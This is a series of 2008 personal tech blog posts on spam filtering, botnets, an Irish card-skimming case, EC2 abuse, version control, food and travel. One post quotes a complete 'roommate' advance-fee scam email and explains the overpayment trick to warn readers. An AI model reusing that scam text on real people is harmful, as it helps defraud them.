On the other hand, the thread also notes many cases of skimming which took place from in-store ATMs in small convenience stores -- those are very widespread now. eek. :(

GoDaddy’s spam filter is broken

Published August 29, 2008

GoDaddy is rejecting mail with URLs that appear in the Spamhaus PBL. As this thread on the Amazon EC2 forum notes, this is creating false positives, causing nonspam mail to be rejected. Here's what GoDaddy reportedly said about this policy:

Unfortunately, our system is set to reject mails sent from or including links listed in the SBL, PBL or XBL. Because the IP address associated to [REMOVED] is listed in the PBL, any emails containing a link to this site will be rejected. This includes plain-text emails including this information.

If this is true, it's utterly broken.

Spamhaus explicitly warn that this is not to be done, on the PBL page:

Do not use PBL in filters that do any ‘deep parsing’ of Received headers, or for other than checking IP addresses that hand off to your mailservers.

And more explicitly in the Spamhaus PBL FAQ:

PBL should not be used for URI-based blocking! Consider the false positive potential: legitimate webservers hosted with services such as dyndns.com or ath.cx! Or consider that ISPs and other networks are encouraged to list any IP ranges which should not send mail, and that could include web servers! Use SBL or XBL (or sbl-xbl.spamhaus.org) for URI blocking as described in our Effective Spam Filtering section. Use PBL only for SMTP (mail).

Critically, the PBL now lists all Amazon EC2 space, since Spamhaus interpret Amazon's policy as forbidding email to be delivered via direct SMTP from there. (Note -- email, not HTTP.)

With this filter in place at GoDaddy, that now means that if you mail a URL of any page on any site hosted at EC2 to a user of GoDaddy, your mail won't get through.

Note: this is much worse than blocks of SMTP traffic from EC2. In that case, an EC2 user can relay their legit SMTP traffic via an off-EC2 host. In this case, there is no similar option in HTTP that isn't insufferably kludgy. :(

The real reason cycling is such a pain in Dublin

Published August 28, 2008

Cian Ginty at the Irish Times writes:

As clunky helmets, yellow reflective gear, and Lycra could be used as a stereotype for Irish cyclists, it might come as a surprise that women wearing high heels are a common sight on bicycles in Copenhagen.

The general image of cycling here is vastly different to so-called bicycle cultures where cycling is normalised and there is talk of a "slow bicycle movement".

"Among thousands and thousands of cyclists on my daily routes, I think I see one or two reflective vests a week, if that," says Mikael Colville-Andersen, a cycling advocate living in Copenhagen.

With Denmark, the Netherlands and Germany - where bicycle usage is high - the helmets and reflective clothing we think of as "a must" for cyclists are far from standard.

It then goes on to rehash some of the stuff that has cropped up recently on cycling blogs about cycling safety, helmets, etc.

The only problem with casualization of cycling, removing gear like helmets, is that without corresponding changes to the road and cycleways to make them safer, it will increase accidents and fatalities. I looked this up a couple of weeks back when I came across an anti-helmet site. Chasing up the figures and doing some research, it became clear that if you simply want to cycle without hurting yourself, the facts were not on their side -- helmets save lives, especially when dealing with shared roadways as we have here.

Copenhagenization is a result of a better, safer road environment for cyclists, as seen in Denmark and the Netherlands, which makes safety gear not as much of a requirement. But on the other hand, Ireland's roads are designed mainly for cars, and Dublin Council have done little to help -- that makes safety gear a requirement, unfortunately :(

However, I think this is the real reason why people don't cycle in Dublin:

Let's take a fictional person, let's call her Kassandra. Kassandra lives a little north of Copenhagen and rides every to work every day between 07:25 and 07:55 and back again between 15:35 and 16:05. Kassandra doesn't mind a little light showers, but if the intensity increases to over 0.4 mm over 30 minutes (light rain), then she thinks it is too wet. Kassandra works five days a week and has weekends and holidays free. That gives her 498 trips between September 2002 and the end of August 2003.

How often does Kassandra get wet either to or from her job that year? The answer is, in fact, rarely. On those 498 trips it was only 17 times. That is only 3.5% or on average 1.5 trips a month.

3.5%. Compare that with what's happened in Dublin this month -- I'd estimate that's meant that at least half of my rides have involved some degree of rainfall, occasioning many cries of woe.

It takes dedication -- and lots of wet-weather gear -- to ride a bike here...

(Of course, having said that, I look out the window and it's immediately sunny ;)

Update: Ryan Meade corrects me in the comments:

Justin, you need to take a look at Owen Keegan’s paper to Velo-City 2005, “Weather and Cycling in Dublin : Perceptions and Reality”. The probability of getting wet is actually pretty comparable to the Copenhagen scenario detailed above - 5.5% for a 30 minute journey if you take 0.2mm per hour at the threshold for “getting wet”. On the other hand the vast majority of both cyclists and motorists think it’s more than 15%, with half thinking it’s above 30%.

Amazing how the psychological, "glass half-empty" factor influences my thinking on this. I had no idea!

How tightly linked are the top spam botnets?

Published August 28, 2008

I was away on holidays last week, and when I got back, I found my feed reader full of some good discussion as to whether today's bigger spam botnets -- Srizbi, Rustock, Mega-D, Cutwail/Pushdo -- are sharing components, such as "landing" sites, exploits, customers, and even command and control networks. It started with this post on the FireEye Malware Intelligence Lab's blog noting:

'Some malware researchers have described Srizbi and Rustock as rival botnets, our data indicates that this apparent rivalry is a sibling rivalry at best. Srizbi and Rustock seem to be supported (controlled) by the same parent (bot herder).'

and in this followup:

'We can clearly see that Srizbi, Pushdo and Rustock are using same ISP, and in many cases, IPs on the same subnet to host their Command and Control servers. It seems extremely unlikely to our research team that three previously "rival" Botnets would share nearly consecutive IP space, and be hosted in the same physical facility. Of all the data centers and IPs in the world, the fact that they are all on the same subnet is very intriguing. This fact makes the FireEye research team conclude that either the Botnets are operated by the same organization, or that the datacenter (McColo) is a shell corporation that leases out it's IP space and bandwidth for nefarious actions.' [...]

'IPs at a typical datacenter are leased out in a /30 or more commonly, a /29 block. However, here we can see that in a given succession of IPs, the three Botnets have C&C servers dispersed throughout. This gives us an impression that same Bot herder leased out a larger range and then distributed it amongst its different Botnets.'

Marshal say: 'at the very least, the major botnets have common customers.'

Dark Reading cover it like so:

Rustock, which recently edged Srizbi for the top slot as the biggest spammer mostly due to a wave of fake Olympics and CNN news spam, and Srizbi, known for fake video and DVD spam, have been using the same Trojan, Trojan.Exchanger, to download their bot malware updates, researchers say. “This is the first time” we had seen this connection between the two botnets, says Fengmin Gong, chief security content officer for anti-botnet software firm FireEye. “That’s why when we saw it, it was surprising. They definitely have a relationship,” he says. “There’s not the rivalry we used to think about.” [...]

Joe Stewart, director of security research for SecureWorks, says the Srizbi-Rustock connection is most likely due to a spammer using both zombie networks -- not that the operators of the two botnets are actually collaborating. “What is confusing people is that you’re seeing Rustock bots sending out emails that essentially infect people with Srizbi, so they think it must be Srizbi that’s sending it, but it’s not,” he says. “Srizbi is not just one big model. It’s rented out to lots of different spammers."

A major spammer may be trying to diversify by using the two botnets, he says. “It could be because they want to separate their malware-seeding operation from their spamming operation,” Stewart says. “Maybe their bots are getting blacklisted faster when they’re sending out URLs with fake video files because they’re easy to spot, so their spam doesn’t get through. So they send malware from this botnet, and spam from this one, to keep out of the blacklists longer.”

I agree that Joe's scenario is very likely; the spammers aren't always the same people who operate the botnets, and it only makes sense that some of them would spread their business among multiple nets, to minimize the risk that all of their output would be blocked if one 'net runs into trouble (or indeed, good filtering ;). But seeing C&C servers sharing LANs also strikes me as unusual. One to watch.

Anyway, it's good to see that the malware research blogs are now actively tracking and posting updates when the botnets change topics and format; this info is very valuable for us in anti-spam, as it allows us to map from the received spam mails back to the sending botnet, and determine which rules are good at detecting each botnet. Thanks, guys.

(image credit: cobalt123, used under CC license)

My Omnivore’s 100

Published August 21, 2008

Here's my results for The Omnivore's Hundred, a silly foodie "purity test". Bold are items I've eaten; crossed-out items are ones I wouldn't eat again. I score 70 out of 100, and clearly need to eat less Asian and more European cuisine ;)

Venison
Nettle tea
Huevos rancheros
Steak tartare
Crocodile
Black pudding
Cheese fondue
Carp
Borscht
Baba ghanoush

Calamari

Pho

PB&J sandwich

Aloo gobi

Hot dog from a street cart

Epoisses

Black truffle

Fruit wine made from something other than grapes

Steamed pork buns

Pistachio ice cream

Heirloom tomatoes

Fresh wild berries

Foie gras

Rice and beans

Brawn, or head cheese

Raw Scotch Bonnet pepper

Dulce de leche

Oysters

Baklava

Bagna cauda

Wasabi peas

Clam chowder in a sourdough bowl

Salted lassi

Sauerkraut

Root beer float

Cognac with a fat cigar

Clotted cream tea

Vodka jelly

Gumbo

Oxtail

Curried goat

Whole insects

Phaal

Goat's milk

Malt whisky from a bottle worth $120 or more

Fugu

Chicken tikka masala

Eel

Krispy Kreme original glazed doughnut

Sea urchin

Prickly pear

Umeboshi

Abalone

Paneer

McDonald's Big Mac Meal

Spaetzle

Dirty gin martini

Beer above 8% ABV

Poutine

Carob chips

S'mores

Sweetbreads

Kaolin

Currywurst

~~Durian~~

Frog's Legs

Beignets, churros, elephant ears or funnel cake

Haggis

Fried plantain

Chitterlings or andouillette

Gazpacho

Caviar and blini

Louche absinthe

Gjetost or brunost

Roadkill

Baijiu

Hostess Fruit Pie

Snail

Lapsang souchong

Bellini

Tom yum

Eggs Benedict

Pocky

Tasting menu at a three-Michelin-star restaurant

Kobe beef

Hare

Goulash

Flowers

Horse

Criollo chocolate

Spam

Soft shell crab

Rose harissa

Catfish

Mole poblano

Bagel and lox

Lobster Thermidor

Polenta

Jamaican Blue Mountain coffee

Snake

(thanks to this generator and mordaxus at Emergent Chaos for the link.)

Irish gang skims 20,000 bank cards through retail POS terminals

Published August 18, 2008

Wow, this is pretty massive. The Irish Payment Services Organisation has again released details of a credit-card breach, this time on retail Point-of-Sale card terminals. Quoting the Irish Examiner story:

Una Dillon, head of card services at the Irish Payment Services Organisation, said the criminals went into the shops pretending to be doing maintenance work on behalf of the banks.

“We have discovered only in the last 48 hours that a number of retailers have been affected by a point-of-sale compromise,” she said. “We are in the lucky position that it was discovered quickly and the gardaí are working on it.

“Gardaí have uncovered a lot of the devices and CCTV footage. We have a list of all the card numbers that have been used. They have either been blocked or restrictions put on those cards.

“With the devices recovered it may just be that the cards were only saved and the criminals did not have a chance to get hold of the card numbers.”

“There will be an emergency meeting today with the gardaí, the terminal vendors and the banks to try and close down on this,” she said, adding the gardaí were in pursuit of the gang.

Insufficient authentication of maintainance staff is being blamed:

“The criminals have been going into shops claiming to be engineers working on the terminals. Staff are used to their bank officials coming to update terminals so unfortunately they have been able to do that.

Bank of Ireland estimated 3,100 of its debit and credit cards were affected and Ms Dillon said the other eight card providers could have similar numbers.

Bank of Ireland said, as a temporary measure, it had reduced the daily withdrawal limit on all its debit cards for ATM transactions outside Ireland to just €100 to protect customers from fraud.

They haven't released the names of the affected shops yet; 20,000 cards, though, sounds like it's been going on for while, on a large scale. Yikes.

The SiliconRepublic story claims that the gang 'plugged in wireless devices that pushed the data to the internet and allowed the card numbers to be used overseas.' However, in the past, these 'wireless devices' didn't use the internet; instead they use parts from mobile phones, which relayed PINs, card numbers and CVV security codes via SMS text messages to Romania. That model seems more likely here, I would guess, due to the reliability of phone networks.

Update: last night's RTE Six-One news bulletin (viewable as streaming RealVideo or transcoded 5MB AVI file), made it clear that the hardware used phone components and SMS. It had some pretty good pics of what appears to be a sample subverted POS terminal:

VISA have been warning about attacks on petrol-pump-based POS terminals since 2006, e.g. this story, but they're more easy to attack since there's few or no staff present by the pumps when the POS terminal subversion takes place. This has resulted in most petrol stations in Ireland disabling POS credit-card payment systems, requiring customers to pay at the counter; we lose convenience, but at least we're probably not being skimmed. But these in-store POS terminals seem to be increasingly under attack; there are reports from Livigno, Italy, Rhode Island, and Canada.

The tamper-proofing of POS terminal hardware is unreliable; it'd be nice to see them made harder to tamper with. I would guess the gang used secondhand, hacked POS terminals, which supposedly should be tamper-evident (ie. easy to spot modifications).

Better yet, if Chip-and-PIN cards used end-to-end crypto between a crypto smartcard and the bank's central systems, POS hacks would be impossible. But there's no sign of that happening.

Most importantly, IPSO has promised that 'banks will refund any customers whose details have been used to make fraudulent transactions.' That's key. It's interesting to note that IPSO have been hammering home this point repeatedly in their stories -- they're worried about customer confidence, I'd guess.

VodaFAIL

Published August 12, 2008

A friend writes:

'I switched my Vodafone bill to "online", to cut down on junk mail. When I tried to log in to view my bill, I was asked for a second level password, specifically:

"your password is the last 4 digits of your customer number (which appears at the top of your phone bill). "

So, I can't see my phone bill because I can't see my phone bill.'

FAIL

On Threading

Published August 10, 2008

Luis Villa, in a post to FoRK:

I have found that [mail] threading is overrated, in part because I've realized that any conversation so baroque as to actually require threading probably isn't worth following.

Even though I wrote a threader for MH, I have to admit by now that he has a point ;)

AppEngine — only useful for toys

Published August 8, 2008

Noted on Twitter:

simonw: So apparently http://www.news.com.au/ used json-time for their Beijing countdown widget and blew my App Engine quota! They've stopped now.

uh, great. That's useful.

Google -- how are we supposed to host useful services with those limits?

Aaaand we’re back

Published August 5, 2008

Due to unfortunate scheduling, taint.org had some downtime there as it moved to a new server. It's back now though.

Some of the other services running on taint.org, jmason.org, yerp.org, twit.ie, planet.spam.abuse.net and so on, are still intermittently offline as I bring them back up in their new home... so have patience, they'll be back soon. ;)

Neocon search terms

Published July 30, 2008

I'm back from a week in Cornwall. I'd like to say I was rested, but chasing after an 11-month-old baby in a caravan isn't all that restful. Still, it was sunny, and good for a change of pace ;)

Via b1ff.org, here's the Nexis search that US Department of Justice White House liaisons ran on job candidates to determine their political leanings:

[first name of a candidate] and pre/2 [last name of a candidate] w/7 bush or gore or republican! or democrat! or charg! or accus! or criticiz! or blam! or defend! or iran contra or clinton or spotted owl or florida recount or sex! or controvers! or racis! or fraud! or investigat! or bankrupt! or layoff! or downsiz! or PNTR or NAFTA or outsourc! or indict! or enron or kerry or iraq or wmd! or arrest! or intox! or fired or sex! or racis! or intox! or slur! or arrest! or fired or controvers! or abortion! or gay! or homosexual! or gun! or firearm!

This Nexis reference says the "w/n" keyword searches for 'words .. within 5 or 10 words of each other, Ex: "Enron w/5 investigation"'.

This is just a smidgen away from the concept of a SpamAssassin-style scoring filter. Crazy stuff.

Best of all, it's buggy and over-sensitive, according to one librarian: 'If that is really their search string, they were going through 99% unrelated citations. There need to be a very nested set of parentheses to make the terms work, starting with one after the w/7. Fired and sex are OR’ed twice and need to be nested, at least in the case of Fired and the OR’d terms immeadiately following.'

Update: good Slashdot comment thread here. This comment indicates that the above librarian might be off-base regarding the w/7 parentheses, since the OR operator has higher priority. Here is an even better walkthrough of the query statement logic. Finally, here's an explanation of the "spotted owl" curiosity...

“Roommate” 419 Scam

Published July 10, 2008

Here's an interesting form of advance fee fraud I hadn't heard of before; it's a good example of 419 scammers ruining yet another casual online marketplace.

Let's say you have a room you want to rent. You put up a "housemate wanted" ad on Craigslist or wherever. Here's the the reply you'll get:

Hi There,

How re you doing? I hope all is well. I'm martha Robot , am 26 yrs old and Am originally from chester united Kingdom . Graduate of I have a master degree in fashion design and I work as a professional fashion designer. I'm am not in the united kingdom right now, i am presently in West africa . I am currently working on contract for a company call (African Family Home Fashions) here in West Africa which the contract will be ending soon. I will be returning to your place soon. I enjoy traveling, It is very interesting to get more knowledge about the new countries, new people and traditions. It's great to have such a possibility. As i was searching through the web i saw the advert of your place . I would like to know maybe it's still available becasue i'm extremely interested in it. Here are the questions i would like to know about the room before planing to move in to the following questions below:

A}I will like to know the major intersection nearest your neighbourhood.like shopping mall,Churches,bus line e.t.c

B}I will like to know the total cost for the my initial move as in first month rent and if you accept deposit.

C}I will like to know if there is any garage or parking space cos I will have my own car come over.

D}I will like to have the rent fee per month plus the utilities.

E}I will like to have the description of the place, size, and the equipments in there.

F}I will also like to know Your payment mode.

G}I will like to know if I can make an advance payment ahead my arrival that will be stand as a kind of commitment that I am truely coming over and for you to hold the place down for me.

I will be very glad to have all this questions answered with out leaving a stone unturned...You can Call my Landlord for more references in UK ..+447024046815.

Email me back:

Thanks. Martha.

Needless to say, this is a scam. Here's how it works (courtesy of this post): The interested "applicant" will send a cashier's check or money order for the deposit, the value of which greatly exceeds the actual amount requested. They will then claim the overpayment to be an honest error based on their confusion about how these things work, and ask the victim to send back a money order refunding that amount, or to send it on to a "travel agent" who is supposedly booking the scammer's flight. The payment will be made via a non-refundable mechanism like the 419er's favourite, Western Union. It will be a matter of great urgency, as they will claim to need the funds to make the trip over. Her money order will clear, their's will not -- and there's no way to refund the payment, so it's gone. This is a classic advance-fee fraud trick, it seems.

Got to love that nom de plume, though -- "Martha Robot". GREE-TINGS MAR-THA RO-BOT!

Googling for 'major intersection nearest your neighbourhood' churches bus finds plenty more:

Finally, a Washington-based realtor has written up a good walkthrough of the scam. He notes:

I recently ran an ad on craigslist.com to see if they were still working it. Craigslist has posted many warnings against responding to such solicitations and I was curious if the scammers had moved on to more fertile ground. They have not; I received 16 such inquiries in one day to a simple ad offering a room for rent in Bellevue. I used a fictitious identity and a newly created email address. I'll use the emails from just one of them as an example. This particular scammer managed to have a check on my doorstep by the next day!

(thanks to nimbus9 for the headsup)

Amazon EC2’s spam and malware problems

Published July 2, 2008

Over the past few weeks, I've increasingly heard of spam and abuse problems originating in Amazon EC2.

This has culminated in a blog post yesterday by Brian Krebs at the Washington Post:

It took me by surprise this weekend to discover that that mounds of porn spam and junk e-mail laced with computer viruses are actively being blasted from digital real estate leased to [Amazon].

He goes on to discuss how EC2 space is now actively blocked by Outblaze, and has been listed by Spamhaus in their PBL list. A spokesperson for Amazon said:

"We have a clear acceptable use policy and whenever we have received a complaint of spam or malware coming through Amazon EC2, we have moved swiftly to strictly enforce the use policy by network isolating (or even terminating) any offending instances," Kinton said. She added that Amazon has since taken action against the EC2 systems hosting the [malware].

However as Seth Breidbart noted in the comments, 'note that Amazon will terminate the instance. That means that the spammer just creates another instance, which gets a new IP address, and continues spamming.' True enough -- as described, instance termination simply isn't good enough.

My recommendations:

as John Levine noted, it's likely that Amazon need to treat EC2-originated traffic similarly to how an ISP treats their DSL pools -- filtering outbound traffic for nastiness, in particular rate-limiting port 25/tcp connections on a per-customer basis, so that an instance run by (or infiltrated by) a spammer cannot produce massive quantities of spam before it is detected and cut off.

However, I'm not talking about blocking port 25/tcp outbound entirely. That's not appropriate -- an EC2 instance is analogous to a leased colo box in a server farm, and not being able to send mail from our instances would really suck for EC2 users (like myself and my employers).
It would help if there were a way to look up customer IDs from the IP address of the EC2 nodes they're using -- either via WHOIS or through rDNS. Even an opaque customer ID string would allow anti-abuse teams to correlate a single customer's activity as they cycle through EC2 instances. This would allow those teams to deal with the reputation of Amazon's customers, instead of Amazon's own rep, analogous to how "traditional" hosters use SWIP to publicize their reassignments of IPs between their customers.

There's some more discussion buried in a load of knee-jerking on the NANOG thread. Here's a few good snippets:

Jon Lewis: 'I got the impression the only thing Amazon considers abuse is use of their servers and not paying the bill. If you're a paying customer, you can do whatever you like.' (ouch.)

Ken Simpson: 'IMHO, Amazon will eventually be forced to bifurcate their EC2 IP space into a section that is for "newbies" and a section for established customers. The newbie space will be widely black-listed, but will also have a lower rate of abuse complaint enforcement. The only scalable way to deal with a system like EC2 is to provide clear demarcations of where the crap is likely to originate from.'

Bill Herrin: 'From an address-reputation perspective EC2 is no different than, say, China. Connections from China start life much closer to my filtering threshold that connections from Europe because a far lower percentage of the connections from China are legitimate. EC2 will get the same treatment.'

There's also an earlier thread here.

Anyway, this issue is on fire -- Amazon need to get the finger out and deal with it quickly and effectively, before EC2 does start to run into widespread blocks. I'm already planning migration of our mail-sending components off of EC2; we're already seeing blocks of mail sent from it, and it's looking likely that these will increase. :(

(It's worth noting that a block of EC2's netblocks today will produce a load of false positives, mainly on transactional mail, if you're contemplating it. So I wouldn't recommend it. But a lot of sites are willing to accept a few FPs, it seems.)

Hack: twitter_no_popups.user.js

Published July 2, 2008

Twitter has this nasty habit -- if you come across a tweet in your feed reader containing a URL, and you want to follow that link, you can't, because Twitter doesn't auto-link URLs in its RSS feeds. Instead, you have to click on the feed item, itself, wait for that to open in the browser, then click on the link in the new browser tab. That link will, in turn, open in another new tab.

Here's a quick-hack Greasemonkey user script to inhibit this second new-tab:

twitter_no_popups.user.js

How To Eat a Mangosteen

Published July 1, 2008

'You'll know what my riddle means
When you've eaten mangosteens.'
-- The Crab That Played with the Sea, by Rudyard Kipling

When I travelled through Thailand, I got rightly hooked on the delicious mangosteen, traditionally dubbed the "Queen of Fruit" by the Thais. I've been keeping an eye out ever since, through our travels to the US and back, without any luck. (In particular, they've been blocked by US customs for a long time, although reportedly this is changing nowadays.)

Finally, last year, they appeared in our local Tesco supermarket here in Ireland -- or at least, an empty box appeared, sans fruit! That was it, though, until a couple of weeks ago, when my friend Bob was lucky enough to come across a few, and grabbed 4 for me. (Thanks Bob!)

It appears they're in season around the start of June, which is when they make it to Tesco's. Naturally, they're much more expensive here -- Tesco were selling them for about EUR 1.20 each, whereas a bag of 30 were about 50 cents when we used to buy them at the street-side in Ko Chang. But that's to be expected, really.

Since they're tricky enough to get hold of, I thought I should document exactly what to do with them once you get 'em ;)

They start off looking like this, roughly tomato-sized fruit with a thick, papery rind:

Get your thumbnail into the rind, not too deep though!, and tear it off like so:

Look at the rind's great colour! Watch out for it, though, as it stains clothing easily. Discard the rind, and pluck out the fleshy, juicy white segments:

(Pay no attention to their resemblance to testicles. ;)

Finally you'll wind up with 6 or so seedless segments, and 1 or 2 seed-bearing segments, larger than the others, containing a large inedible seed along with a fair bit of flesh:

Eat 'em and enjoy the flavour -- it's a bit like a tart, vanilla-y peach, but juicier, creamier and much smoother in texture. Mmmm, truly delicious. I'm looking forward to picking up some more soon!

I considered planting the seeds, but unfortunately, you can forget about growing a tree in your back yard; the mangosteen tree requires a tropical climate:

'The mangosteen is ultra-tropical. It cannot tolerate temperatures below 40º F (4.44º C), nor above 100º F (37.78º C). Nursery seedlings are killed at 45º F (7.22º C).'

Ah well. Seems I'll be at Tesco's mercy for more.

VCS and the 1993 internet

Published June 23, 2008

Joey Hess suggests that current discussions about the superfluity of DVCS systems have a parallel in how the internet protocol world, circa 1993, played out:

I'm reminded of 1993. Using the internet at that time involved using a mishmash of stuff -- Telnet, FTP, Gopher, strange things called Archie and Veronica. Or maybe this CERN "web" thing that Tim Berners-Lee had just invented a few years before, but that mostly was useful to particle physicists.

Then in 1994 a few more people put up web sites, then more and more, and suddenly there was an inflection point. Suddenly we were all browsing the web and all that other stuff seemed much more specialised and marginalised.

I would disagree, a little. Back in the early '90's, I was a sysadmin playing around with internet- and intranet-facing TCP/IP services (although in those days, the term "intranet" hadn't been coined yet), so I gained a fair bit of experience at the coal-face in this regard. The mish-mash of protocols -- telnet, gopher, Archie, WAIS, FTP, NNTP, and so on -- all had their own worlds and their own views of the 'net. What changed this in 1993 was not so much the arrival of HTTP, but TimBL's other creation: the URL.

The URL allowed all those balkanized protocols to be supported by one WWW client, and allowed a HTML document to "link" to any other protocol --

The WWW browsers can access many existing data systems via existing protocols (FTP, NNTP) or via HTTP and a gateway. In this way, the critical mass of data is quickly exceeded, and the increasing use of the system by readers and information suppliers encourage each other.

This was a great "embrace and extend" manoeuvre by TimBL, in my opinion -- by embracing the existing base of TCP/IP protocols, the WWW client became the ideal user interface to all of them. Once NCSA Mosaic came along, there really was no alternative to rival the Web's ease of use. This was the case even if you didn't have a HTTP server of your own; you could still access HTML documents and remote URLs.

In essence, HTML and the URL were the trojan horse, paving the way for HTTP (as HTML's native distribution protocol) to succeed. It wasn't the web sites that helped the WWW "win", but embrace-and-extend via the URL.

For what it's worth, I think there is an interesting parallel in today's DCVS world: git-svn.

Firefox Download Evening

Published June 17, 2008

Happy Firefox Download Day -- or rather, Firefox Download Evening!

It turns out that the "day" in question has been defined as a 24-hour period starting at 10am Pacific Time; rather than compensating for the effects of timezones around the world, they've just picked an arbitrary 24-hour period.

That's 6pm in Irish time, for example. At least I'm not one of the 57,000 Japanese pledgers, who'd be waiting up until 2am to kick off their download. It seems a little bizarre that there's little leeway provided for non-US downloaders, who are right now twiddling their thumbs, waiting, while their "day" passes.

Annoyingly, the main world record page simply says 'the official date for the launch of Firefox 3 is June 17, 2008' -- no mention of a starting time or official timezone at all!

This is the top thread on their forum right now -- in addition to the omission of an entire continent ;)

adding to the “Going Dark” and DVCS debate

Published June 16, 2008

On programmers "going dark" -- Aristotle Pagaltzis writes:

Jeff Atwood argues that open source projects are in real danger of programmers “going dark,” which means they lock themselves away silently for a long time, then surface with a huge patch that implements a complex feature.

It seems to me that this is as much a technological problem as a social issue... and that we have the technological solution figured out: it’s called distributed version control. It means that that lone developer who locked himself in a room need not resurface with a single huge patch – instead, he can come back with a branch implementing the feature in individually comprehensible steps. At the same time, it allows the lone programmer to experiment in private and throw away the most embarrassing mistakes, addressing part of the social problem.

However, I don't think he realised that the Jeff Atwood story he responded to was in fact an echo of Ben Collins-Sussman's original article, where he specifically picked out DVCS as a source of this danger:

A friend of mine works on several projects that use git or mercurial. He gave me this story recently. Basically, he was working with two groups on a project. One group published changes frequently...

“…and as a result, I was able to review consistently throughout the semester, offering design tweaks and code reviews regularly. And as a result of that, [their work] is now in the mainline, and mostly functional. The other group [...] I haven’t heard a peep out of for 5 months. Despite many emails and IRC conversations inviting them to discuss their design and publish changes regularly, there is not a single line of code anywhere that I can see it. [...] Last weekend, one of them walked up to me with a bug [...] and I finally got to see the code to help them debug. I failed, because there are about 5000 lines of crappy code, and just reading through a single file I pointed out two or three major design flaws and a dozen wonky implementation issues. I had admonished them many times during these 5 months to publish their changes, so that we (the others) could take a look and offer feedback… but each time met with stony silence. I don’t know if they were afraid to publish it, or just don’t care. But either way, given the code I’ve seen, the net result is 5 wasted months.”

Before you scream; yes yes, I know that the potential for cave-hiding and writing code bombs is also possible with a centralized version control system like Subversion. But my friend has an interesting point:

“I think this failure is at least partially due to the fact that [DVCS] makes it so damn easy to wall yourself into a cave. Had we been using svn, I think the barrier to caving would have been too high, and I’d have seen the code.”

In other words, yes, this was fundamentally a social problem. A team was embarrassed to share code. But because they were using distributed version control, it gave them a sense of false security. “See, we’re committing changes to our repository every day… making progress!” If they had been using Subversion, it’s much less likely they would have sat on a 5000 line patch in their working copy for 5 months; they would have had to share the work much earlier.

To be honest, I'd tend to agree with Aristotle; just because centralized VC makes it harder to maintain a "private branch" with this "high barrier to caving", and this therefore imposes a technical pressure to fix a social problem, doesn't mean that is a good thing. I'd prefer to fix the DVCS to apply social pressure, and have both working tools and a working social organisation.

Another commenter on Ben's original post put it well:

I [..] disagree, strongly, that DVCS makes code hiding any more difficult than single-branch VCS. When using a single branch, it’s usually a very small group of people who are allowed to commit. Any patches from non-core contributors get lost in a tangle of IRC pastebins, mailing lists, bug trackers, and blog posts. Furthermore, even if these patches are eventually committed, they have lost all their associated version information — the destructive rebase you complain about. DVCS allows anybody to branch from trunk, record their changes, and publish their branch in a service like Launchpad or github. For an example of this, look at the mass of user-created branches for popular projects like GNOME Do or AWN.

It's very interesting to see those Launchpad sites, in my opinion.

I've spent many years shepherding contributions to SpamAssassin through our Bugzilla. We've often lost rule contributors, who are particularly hard to attract for some reason, due to delays and human overhead involved in this method. :( So an improved interface for this would be very useful...

Ireland tourism tips

Published June 5, 2008

connemara

So, Nelson is apparently contemplating a trip to Ireland, and was looking for tips. Since he's not the first to ask, I thought I'd do some research among my friends on things to do and good places to stay and eat in our native country. Here's the result.

First off -- it's worth noting that we're all thirty-somethings, so backpacker stuff and heavy boozing is no longer on the menu. If you're after that, though, head for Temple Bar in Dublin ;) This is mainly nice hotels, good food, and interesting things to look at.

To start with, I'd recommend driving as a means of getting around. Lots of the good stuff can't be reached any other way, and the roads are generally pretty good nowadays (if a little narrow).

Prepare for rain.

Things to do: Connemara and Kerry are stunning; in my opinion, they're unmissable, if you're coming to Ireland in search of natural beauty. Clare and West Cork are pretty good too. Generally, the west coast is the place to go.

A friend recommends the Skelligs: 'the best thing I've seen in Ireland. If its sunny. If its raining it sucks so don't go.' (I've never been -- appalling, given that my great-grandfather wrote one of the definitive works on them, I need to fix that.)

Stuff to avoid: Dublin's not too hot, unfortunately. Over-priced and hard to get around due to traffic. I mean, it's quite nice, especially to live in, but as a tourist destination compared to other cities around the world I don't quite get the attractiveness. Also, the south-east corner of the country, while full of nice friendly people, is exorbitantly expensive in my experience (even pricier than Dublin!), short on good stuff to see, and a bit of a washout, so I say skip it. (I have no idea why it's so expensive, BTW. my theory is that it's a traditional in-country holiday venue for Dubliners, and the Wexford inhabitants love to fleece us, so we got fleeced. whatever.)

In general, I'd say the larger towns aren't too exciting; stick to the country.

The Lonely Planet guide to Ireland, while frequently backpacker-oriented, is pretty good for non-backpacker stuff as well. If you're driving around, it's a good source of offbeat stuff to check out. I used it a lot when driving around Connemara last year. They also do a great book of hikes which I can recommend.

Next, places to stay... that friend again: 'if you're doing the Ring of Kerry, I strongly recommend diverting to Valentia and staying in Glanleam House (beautiful grub, beautiful gardens, cheap) and doing a day trip from there to the Skelligs.'

Temple House in Sligo also comes recommended: 'a classical Georgian mansion set in an estate of 1,000 acres, overlooking a 13th century lakeside castle of the Knights Templar.'

There are lots of useless hotel/B&B sites in Google, making it hard to tell crap from quality. But these sites come recommended:

Ireland's Blue Book - 'luxury accommodation in Irish Country House Hotels, Manor Houses and Castles. Also listed are Ireland's finest gourmet restaurants.' This is high-end stuff, but it's pretty reliable, as far as I can see.
Friendly Homes of Ireland - another friend says 'aka crazy houses of Ireland -- terrible webpage, but good accommodation (its also a more attractive guide). We stayed here and loved it.'
Hidden Ireland - 'a unique collection of historic private houses which provide the very best and most stylish country house accommodation available in Ireland - great Irish hospitality at an affordable price. Our houses are not hotels and are very much more than ordinary guesthouses. They all offer a rare opportunity to experience the lifestyle of a bygone age - a special and fascinating alternative to conventional tourist accommodation.'
Irish Landmark Trust, if you're interested in self-catering stays at heritage houses.
Georgina Campbell guidebooks are apparently quite good.

Finally, scams and rip-offs are few and far between, so that's not something to worry about. Crappy service and mediocre food, however, is more likely to be the source of problems. At least you can now get decent espresso pretty much everywhere!

Hope that helps someone ;) Got tips of your own? Feel free to add comments!

TypePad AntiSpam

Published May 30, 2008

TypePad AntiSpam looks pretty cool. I've been trying it out for the past week on taint.org and underseacommunity.com, with no false positives or false negatives so far (although mind you I don't get much spam, anyway, on those blogs, fortunately). Both are WordPress blogs -- I set up Akismet, got a TypePad API key, and edited 3 lines in "wp-content/plugins/akismet/akismet.php", and I was off.

However, here's the key bit, the bit I'm most excited about -- /svn/antispam/trunk/, particularly the GPL v2 LICENSE file -- a fully open source backend!

The backend is a perl app built on Gearman and memcached. It uses DSpam instead of SpamAssassin, but hey, you can't have everything ;) Nice, clean-looking perl code, too. Here's hoping I get some tuits RSN to get this installed locally...

Daily links are back again

